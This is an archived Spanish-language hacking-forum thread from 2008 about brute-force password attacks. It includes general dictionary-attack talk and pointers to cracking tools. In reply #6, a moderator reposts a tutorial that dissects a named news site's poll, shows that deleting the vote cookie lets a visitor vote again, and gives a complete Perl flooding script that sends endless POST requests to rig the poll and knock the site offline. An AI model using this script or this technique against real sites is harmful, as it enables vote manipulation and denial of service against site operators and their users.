Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 22, 2008, 12:06:31
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL (Moderadores: |Shadow|, ManCuerTex (ViPeR))  |  Tema: Fuerza Bruta desde el Comienzo 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Fuerza Bruta desde el Comienzo  (Leído 443 veces)
symphony
Recien Llegado
*
Desconectado Desconectado

Mensajes: 15


Ver Perfil
« en: Mayo 03, 2008, 09:57:26 »
hola gente vamos a hablar un poco de Fuerza Bruta:
Desde el comienzo En los sistemas, los administradores desearon limitar el acceso a determinados usuarios con autorización para acceder al mismo. Con el fin de bloquear el acceso a quienes no posean ésta autorización se crearon las contraseñas. Cada usuario posee ahora un username (nombre de usuario) y una contraseña. Cada vez que un usuario autorizado desea acceder al sistema debe introducir dichos datos, si los datos son reales el sistema le permite el acceso, sino de lo niega. Uno de los problemas en estos sistemas surge cuando un tercero consigue los datos de un usuario y los utiliza para acceder al sistema, su acceso será permitido sin importar si la persona no es quien dice decir ya que los datos son reales. Otro problema, es el que permite los ataques por fuerza bruta; Si el acceso ha sido denegado, en determinados sistemas se puede volver a intentar infinitas veces, igualmente a esta altura están surgiendo sistemas que no permiten mas de X intentos cada X minutos. Los ataques a través de fuerza bruta se aprovechan de sistemas que permiten infinitos intentos, los que a esta altura se los puede llamar…. “VULNERABLES”. Éstos ataques se basan en diccionarios y consisten en bombardear al sistema con nombres de usuarios y contraseñas aleatorios. Estos diccionarios se forman normalmente por archivos de extensión txt, uno para usuarios y otros para contraseñas. Hay que tener en cuenta que el número de posibilidades entre usuarios y contraseñas es demasiado alto, y por eso se utilizan diccionarios. Avanzando un poco más…. La única forma de que este ataque devuelva un usuario y una contraseña que nos permitan el acceso al sistema es que el usuario y la contraseña se encuentren en nuestros diccionarios. Hay usuarios que utilizan estos sistemas con el simple fin de cambiar la contraseña del usuario, ya que si a través de fuerza bruta es posible conocer sus datos, quiere decir que su usuario y contraseña son palabras existentes en los diccionarios de determinados idiomas y por lo tanto fáciles de descubrir, demostrándole al usuario que sus datos son débiles. Hablando de idioma, hay que tener en cuenta de donde es nuestra victima, ya que si ésta es de Rusia no nos serviría de nada utilizar un diccionario Español.  Supongo que al leer esto, muchos los que conocían algo del tema están sorprendidos y creen que los ataques por fuerza bruta no sirven porque es muy difícil que su usuario y contraseña se encuentren en nuestros diccionarios, no se desesperen, en la red se encuentran diccionarios muy completos.
utiles aca esta el zip cracker.

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
En línea
El ArT3 De lA iNtrusion
AnUbIsSs
Habitual
*****
Desconectado Desconectado

Mensajes: 253


Que coño miras el foro esta a la derecha xD


Ver Perfil WWW
« Respuesta #1 en: Mayo 04, 2008, 07:10:14 »
bueno en mi opinion la fuerza bruta se utiliza muy poco ya que para sacar una pass tardarias miles de años (eso si depende como sea el pass) tambien este tipo de ataques son muy detectados por los administradores.La forma mas correcta para mi seria con un buen diccionario,pero tambien hay que tener en cuenta la pass si la pass  fuera "mariposa" tendriamos muchas posibilidades de consegirla pero si fuera "Mariposa302" no tendriamos ninguna posibilidad ya que se mezclan mayusculas minusculas y numeros.   
En línea
symphony
Recien Llegado
*
Desconectado Desconectado

Mensajes: 15


Ver Perfil
« Respuesta #2 en: Mayo 04, 2008, 05:20:26 »
Los programas de fuerza bruta pueden iniciar con una combinacion aleatoria, secuencial o basada en un diccionario que genralmente puedes bajar por ahi en forma de texto plano.

Puedes bajar una programa como este:

Webmaster Password Generator

Genera tantas contraseñas como quieras automáticamente
Como su propio nombre indica, esta utilidad te permite generar contraseñas de forma automática, tantas como quieras al mismo tiempo, siguiendo una serie de parámetros de configuración.

Incorpora una atractiva interfaz y es muy sencilla de usar; sólo tienes que marcar tus preferencias a la hora de crear las contraseñas (con mayúsculas o minúsculas, con números o con caracteres especiales, longitud de la clave, etc.) y hacer clic en el botón "Generate".

Descarga directa:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
« Última modificación: Mayo 04, 2008, 05:21:22 por symphony » En línea
El ArT3 De lA iNtrusion
kobold666
Miembro
*****
Desconectado Desconectado

Mensajes: 48



Ver Perfil
« Respuesta #3 en: Mayo 05, 2008, 09:54:34 »
me parece algo interesante pero no muy practico
En línea
OzX
Moderación
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2147


http://foro.undersecurity.net


Ver Perfil WWW
« Respuesta #4 en: Mayo 07, 2008, 05:28:07 »
Cita de: kobold666 en Mayo 05, 2008, 09:54:34
me parece algo interesante pero no muy practico

100% de acuerdo.

aunque si el sistema de fuerza bruta es parecido a los fllod (lo q pienso), porque es mas posble que generes un dos con tantas  consultas, que encuentres la pass.

pasa en los sistemas cms q no tienen restricciones de intentos de acceso, muchas consultas y paff. cae sistema.
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
AnUbIsSs
Habitual
*****
Desconectado Desconectado

Mensajes: 253


Que coño miras el foro esta a la derecha xD


Ver Perfil WWW
« Respuesta #5 en: Mayo 08, 2008, 03:00:18 »
entonces si yo le iziera un ataque de fuerza bruta a un sistema CMS caeria en un DDos?
En línea
OzX
Moderación
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2147


http://foro.undersecurity.net


Ver Perfil WWW
« Respuesta #6 en: Mayo 08, 2008, 06:18:55 »
Cita de: OzX en Marzo 26, 2008, 12:36:36
- Analizando el Lado Oscuro de la auditoria Web, aveces queremos votar un sitio web, por distintas razones que estas sean, sin embargo la mayoria para no decir todos, empiezan a analizar la web en busca de las vulnes genericas,  blog, foros, etc. CMS en general.

- Pero Aveces la solucion esta mucho mas Simple.
  • El maximo de daño desde lo mas simple

- Por ejemplo en Muchos Sitios Web se encuentran sistemas de Votaciones, y estas estan conectados a la base de datos,en donde la  podemos afectar si la saturamos con multiples votaciones en muy pocos Segundos o en un tiempo prolongado.

Para Evitar Estos Tipos de "Saturaciones", Existen 2 Tipos de Restricciones (para votar mas de 1 vez):

  • Cookies
  • IP
Por Ej:


Votamos:



Ahora Analizamos las Cabezeras Http, Antes ,"en el acto" y Despues de Votar::
- Antes de Votar
Citar
Host:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.elcanillita.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

En el Acto de Votar:
Citar
Host:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.elcanillita.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Cookie: PHPSESSID=i4tgn9pmncb8tgmjokavkqcrj2;
Content-Type: application/x-www-form-urlencoded

Contenido Post:
Citar
radio=opcion2&url_back=%2Findex.php

Despues de Votar:
Citar
GET / HTTP/1.1
Host:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.elcanillita.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=26q3nmpv44trpf6t4kj2ro1hk5; voto=1



Podemos Ver que Este Sistema Esta basado en el Registro de Cookies en Nuestro Navegador:

Cookie: PHPSESSID=26q3nmpv44trpf6t4kj2ro1hk5; voto=1

Podemos Ver como el Mismo Php nos Genera una cookie de nuestra session, y tambien nos registra el Voto, el cual dice claramente que ya vamos 1 vez.

y Tenemos el Contenido Post De la Votacion
Citar
radio=opcion2&url_back=%2Findex.php
Elige la Opcion 2 "Obama" (XD¡ Ek XD¡)



Ahora Modifiquemos Los Datos:
Citar
Cookie: PHPSESSID=26q3nmpv44trpf6t4kj2ro1hk5; voto=1

Si Borramos la Cookie o Tan Solo, Borramos "voto=1", podemos Volver a votar con el mismo contenido Post.

Votamos por Obama:
Antes:

Despues De Repetir los Datos Eliminando "vote=1"


Podemos Ver que Podemos Manipular la Votacion, si Nada Mas Modificamos el registro de la votacion que nos deja en la cookie de nuestro navegador:

Ahora Si Automatizamos Todo Esto?



Código:
use IO::Socket;
system ("cls");
#By OzX
print q(
##############################################
#     Flooder Votaciones Post                #
#                 by OzX                     #
#   NB.Net Labs  Tutorial Post & Get H-NeZ 2 #
##############################################
);


$server="www.elcanillita.com";
$path="/confirmavoto.php";
$post="radio=opcion2&url_back=%2Findex.php";

for ($x=1;$x<=9999999999999999999999999;$x++){
       
$largo_post = length $post;

my $socket = new IO::Socket::INET (
                                 PeerAddr => "$server",
                                 PeerPort => "80",
                                 Proto => "tcp",
                                );
die "\n Error: $!\n" unless $socket;

print $socket "POST $path HTTP/1.1\n";
print $socket "Host: $server \n";
print $socket "Referer: $server\n";
print $socket "Accept-Language: en-us\n";
print $socket "Content-Type: application/x-www-form-urlencoded\n";
print $socket "Accept-Encoding: gzip, deflate\n";
print $socket "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;rv:1.7.Cool Gecko/20050511 Firefox/1.0.4\n";
print $socket "Connection: Keep-Alive\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Content-Length: $largo_post\n\n";
print $socket "$post\n";
close($socket);
syswrite STDOUT, ".";
}

Y CraSh¡ D.o.S


Y dejamos la Votacion en Las Nubes.



OzX¡



Sacado de

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

Saludos¡
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
SlayCool
Habitual
*****
Conectado Conectado

Mensajes: 182


La imaginacion es la logica mas grande del mundo.


Ver Perfil
« Respuesta #7 en: Mayo 08, 2008, 06:31:52 »
Bueno me paso lo siguiendo utilizando un programa de fuerza bruta queria sacar el pass de un archivo comprimido en winrar me consegui un pograma de fueza fruta  y me decia que tardaria 3 años -_- en mi opinion la fuerza bruta fue en minimas proporciones util pero ahora son minusculas las posibilidades.

Salu2
En línea
Les invito a todos a ver este Curso de Flourish
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
AQUI
AnUbIsSs
Habitual
*****
Desconectado Desconectado

Mensajes: 253


Que coño miras el foro esta a la derecha xD


Ver Perfil WWW
« Respuesta #8 en: Mayo 09, 2008, 09:59:22 »
Cita de: SlayCool en Mayo 08, 2008, 06:31:52
Bueno me paso lo siguiendo utilizando un programa de fuerza bruta queria sacar el pass de un archivo comprimido en winrar me consegui un pograma de fueza fruta  y me decia que tardaria 3 años -_- en mi opinion la fuerza bruta fue en minimas proporciones util pero ahora son minusculas las posibilidades.

Salu2

claró pero no siempre por que como dije anteriormente puedes tardar años en consegir una pass pero ya depende de cual y tambien depende del crackeador que uses.

OzX buen aporte  Wink
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL (Moderadores: |Shadow|, ManCuerTex (ViPeR))  |  Tema: Fuerza Bruta desde el Comienzo « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC